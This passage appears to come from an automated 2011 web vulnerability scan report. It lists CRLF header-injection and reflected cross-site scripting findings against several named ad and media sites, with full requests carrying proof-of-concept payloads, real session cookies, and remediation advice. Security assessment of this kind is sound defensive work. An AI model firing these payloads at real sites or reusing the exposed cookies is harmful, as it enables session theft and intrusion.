&ot=A&u=0&AQE=124537
2e8dc5adfe9&A2S=1/respcamphist;src=1513429;ec=nh;rch=2;lastimp=0;lastimptime=0;lis=0;lip=0;lic=0;lir=0;lirv=0;likv=0;lipn=;lastclk=0;lastclktime=0;lcs=0;lcp=0;lcc=0;lcr=0;lcrv=0;lckv=0;lcpn=;ord=1296755474
The value of REST URL parameter 1 is copied into the Location response header. The payload 62530%0d%0a230925b8b8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /62530%0d%0a230925b8b8/N3340.scanscout.com/B4852812.30 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;
Response
HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/62530
230925b8b8/N3340.scanscout.com/B4852812.30:
Date: Thu, 03 Feb 2011 22:03:15 GMT
Server: GFE/2.0
Connection: close
The value of REST URL parameter 1 is copied into the Location response header. The payload 333cd%0d%0a3e381d53e01 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /333cd%0d%0a3e381d53e01/N3671.TMP/B5159652.23;sz=160x600;pc=[TPAS_ID];click=http://ad.trafficmp.com/a/click?_-611797114104433*_3107*laKR_99*KEB_115*tlB_3443735*xpC_3247**14288lsu2vxsy___3533310**0_3805*MXc_114**_-862839443;ord=5929963708858950656? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/lb.buzzillions/;net=lb;u=,lb-28103178_1296770408,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;kw=reviews%2F59ab9%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E4e54375ce26%2Fx22;pos=btf;tile=5;sz=160x600;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296769784?
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
The value of REST URL parameter 1 is copied into the Location response header. The payload 87fe3%0d%0a9a9fc1f6091 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /87fe3%0d%0a9a9fc1f6091/N553.158901.DATAXU/B4970757.4;sz=728x90;pc=[TPAS_ID];ord=628759578? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0054251952045395&output=html&h=90&slotname=7506363877&w=728&lmt=1296848235&flash=10.1.103&url=http%3A%2F%2Fwww.exploit-db.com%2Fvbseo-from-xss-to-reverse-php-shell%2F&dt=1296826635258&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7506363877&correlator=1296826635225&frm=0&adk=774897698&ga_vid=2124507869.1296826622&ga_sid=1296826622&ga_hid=277931053&ga_fc=1&u_tz=-360&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1017&bih=953&eid=30143102&fu=0&ifi=2&dtd=29&xpc=2r8iU0N2xu&p=http%3A//www.exploit-db.com Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/87fe3 9a9fc1f6091/N553.158901.DATAXU/B4970757.4%3Bsz%3D728x90%3Bpc%3D%5BTPAS_ID%5D%3Bord%3D628759578: Date: Fri, 04 Feb 2011 17:55:39 GMT Server: GFE/2.0
The value of REST URL parameter 1 is copied into the Location response header. The payload 9db3a%0d%0aa4d4062d9d8 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.
Request
GET /9db3a%0d%0aa4d4062d9d8/lb.buzzillions/;net=lb;u=,lb-5843489_1296770394,11d765b6a10b1b3,none,an.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1;;pos=atf;tile=1;dcopt=ist;sz=728x90;contx=none;dc=w;btg=an.51;btg=an.5;btg=ex.32;btg=ex.76;btg=cm.cm_aa_gn1;btg=cm.sportsreg;btg=cm.sportsfan;btg=cm.de16_1;btg=cm.de18_1;btg=cm.rdst7;btg=cm.rdst8;btg=cm.polit_h;btg=cm.sports_h;btg=cm.weath_l;btg=cm.ent_h;btg=bk.rdst1;ord=1296770389? HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.buzzillions.com/reviews/59ab9%3C/title%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E4e54375ce26/x22 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=c653243310000d9|2409535/850532/15008,189445/526157/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc
Response
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/9db3a a4d4062d9d8/lb.buzzillions/%3Bnet%3Dlb%3Bu%3D%2Clb-5843489_1296770394%2C11d765b6a10b1b3%2Cnone%2Can.51-an.5-ex.32-ex.76-cm.cm_aa_gn1-cm.sportsreg-cm.sportsfan-cm.de16_1-cm.de18_1-cm.rdst7-cm.rdst8-cm.polit_h-cm.sports_h-cm.weath_l-cm.ent_h-bk.rdst1%3B%3Bpos%3Datf%3Btile%3D1%3Bdcopt%3Dist%3Bsz%3D728x90%3Bcontx%3Dnone%3Bdc%3Dw%3Bbtg%3Dan.: Date: Fri, 04 Feb 2011 01:50:01 GMT Server: GFE/2.0
The value of REST URL parameter 2 is copied into the Location response header. The payload cdbde%0d%0ad36a9dd2cc was submitted in the REST URL parameter 2. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Remediation background
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (&lt; &gt; etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of REST URL parameter 3 is copied into an HTML comment. The payload bf5ec--><script>alert(1)</script>db1ccd44039 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /vp2/d/deeplinkbf5ec--><script>alert(1)</script>db1ccd44039 HTTP/1.1 Host: abc.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Thu, 03 Feb 2011 22:03:31 GMT Server: Apache/2.2.3 (Red Hat) X-Powered-By: PHP/5.2.9 Content-Length: 4911 Connection: close Content-Type: text/html; charset=UTF-8 Vary: Accept-Encoding
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload b6987<script>alert(1)</script>1178017b98e was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /beacons?callback=jsonp1296766389465b6987<script>alert(1)</script>1178017b98e HTTP/1.1 Host: ads.adap.tv Proxy-Connection: keep-alive Referer: http://www.veoh.com/browse/videos/category/action_adventure2e455%3Cimg%20src%3da%20onerror%3dalert(1)%3Ecd67645eb41/watch/v18978294NGnK88j8/x22 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: creativeViews="{\"v\":1,\"views\":[{\"id\":2840,\"ts\":1296135287,\"cts\":null}]}"; rtbData0="key=tidaltv:value=56bdd173-7d00-46e9-8ce1-554488db4bb8:expiresAt=Mon+Mar+28+06%3A24%3A48+PDT+2011:32-Compatible=true,key=testbuyer2451:value=wwqd12345:expiresAt=Thu+Jan+27+11%3A14%3A25+PST+2011:32-Compatible=true"; unique_ad_source_impression="11427%2C14970%2C8641%2C11573%2C14265__TIME__2011-01-27+05%3A24%3A55"; asptvw1="as7037%2C2%2C2011-01-27%2F12-09-46+ap1894%2C1%2C2011-01-27%2F12-09-31"; adsrcvw1="15517%2C2%2C2011-01-28%2F11-09-46"; marketTransaction="true__TIME__2011-01-27+11%3A09%3A45"; adaptv_unique_user_cookie="4260041098738838008__TIME__2011-02-03+06%3A17%3A46"; audienceData="{\"v\":2,\"providers\":{\"2\":{\"f\":1298707200,\"e\":1298707200,\"s\":[292,293],\"a\":[]},\"10\":{\"f\":1299312000,\"e\":1299312000,\"s\":[],\"a\":[]},\"13\":{\"f\":1298707200,\"e\":1298707200,\"s\":[524],\"a\":[]},\"14\":{\"f\":1298707200,\"e\":1298707200,\"s\":[],\"a\":[{\"val\":\"000\",\"id\":5}]}}}"
The value of the url request parameter is copied into a JavaScript rest-of-line comment. The payload 6f421%0aalert(1)//3a48dc45b10 was submitted in the url parameter. This input was echoed as 6f421 alert(1)//3a48dc45b10 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /gadgets/ifr?synd=ads&url=http%3A%2F%2Fwww.ljmsite.com%2Fgoogle%2Fgadgetads%2Fkayakhotel%2F728x90.xml6f421%0aalert(1)//3a48dc45b10&lang=en&country=US&up_clickurl=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26num%3D1%26ggladgrp%3D9764709784055921816%26gglcreat%3D9143352621951917205%26sig%3DAGiWqtwyJ0z2eP12NfR0KoaagOUkxWNa_A%26client%3Dca-pub-3033999741136561%26adurl%3D&up_aiturl=http://googleads.g.doubleclick.net/pagead/conversion/%3Fai%3DBuG1yFmZLTcWQPMbjlQe2s9g5trWeyQG615CeEcCNtwHQllEQARgBIMDIgxo4AFCb29C6AWDJvrKJkKTQEaABxJH67gOyAQ53d3cuYml6ZmluZC51c7oBCTcyOHg5MF9hc8gBCdoBXWh0dHA6Ly93d3cuYml6ZmluZC51cy8xNS8xODIyMjEvYWJjLWRldmVsb3BtZW50LWluYy9jaGljYWdvLmFzcHgveDIyLyUyMm5zPSUyMmFsZXJ0KDB4MDAwNkMxKeABA7gCGMgC5qXPF6gDAdEDCGK0Eaa7ijn1AwAAAMQ%26sigh%3DG7T3ZBT9Zc4%26label%3D_AITNAME_%26value%3D_AITVALUE_&up_ads_clicktarget_new_=0&up_rawquery=chicago%20hotels&up_city=Crystal&up_region=US-MI&up_lat=43.26&up_long=-84.91 HTTP/1.1 Host: ads.gmodules.com Proxy-Connection: keep-alive Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-3033999741136561&output=html&h=90&slotname=2791779905&w=728&lmt=1296808620&flash=10.1.103&url=http%3A%2F%2Fwww.bizfind.us%2F15%2F182221%2Fabc-development-inc%2Fchicago.aspx%2Fx22%2F%2522ns%3D%2522alert(0x0006C1)&dt=1296787020952&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=7707606529%2C2067036752&correlator=1296787019866&frm=0&adk=1244530545&ga_vid=371918977.1296786866&ga_sid=1296786866&ga_hid=969342198&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1033&bih=1012&fu=0&ifi=3&dtd=11&xpc=WZvbsEpZ0D&p=http%3A//www.bizfind.us Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Unable to retrieve spec for http://www.ljmsite.com/google/gadgetads/kayakhotel/728x90.xml6f421 alert(1)//3a48dc45b10. HTTP error 400
3.4. http://advertise.tucows.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://advertise.tucows.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41f20"-alert(1)-"c17f4a73141 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?41f20"-alert(1)-"c17f4a73141=1 HTTP/1.1 Host: advertise.tucows.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Thu, 03 Feb 2011 22:03:33 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Set-Cookie: PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Connection: close Content-Type: text/html Content-Length: 84492
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Free Software and Sh ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 25a76"-alert(1)-"4bef7d4836e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes25a76"-alert(1)-"4bef7d4836e/corpbar/cb3.0/css/style.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:21 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32339
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9378"-alert(1)-"68cf811d6fc was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbarb9378"-alert(1)-"68cf811d6fc/cb3.0/css/style.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:27 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32469
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f1d63"-alert(1)-"f61e34bb76a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.0f1d63"-alert(1)-"f61e34bb76a/css/style.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:45 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32415
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f8543"-alert(1)-"e7c1cf5b326 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /includes/corpbar/cb3.0/cssf8543"-alert(1)-"e7c1cf5b326/style.css HTTP/1.1 Host: advertise.tucows.com Proxy-Connection: keep-alive Referer: http://advertise.tucows.com/?41f20%22-alert(1)-%22c17f4a73141=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=2a19ddf330d96d5496a9e6d3718b536d; 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D
Response
HTTP/1.0 404 Not Found Date: Fri, 04 Feb 2011 17:56:55 GMT Server: Apache/2.2.14 (Ubuntu) PHP/5.3.2-1ubuntu4.2 with Suhosin-Patch mod_ssl/2.2.14 OpenSSL/0.9.8k X-Powered-By: PHP/5.3.2-1ubuntu4.2 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: 2a19ddf330d96d5496a9e6d3718b536d=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 32295
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title> Page Not Found</tit ...[SNIP]... <script> loggedIn = false;
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 471ee"-alert(1)-"f64e6d809a6 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
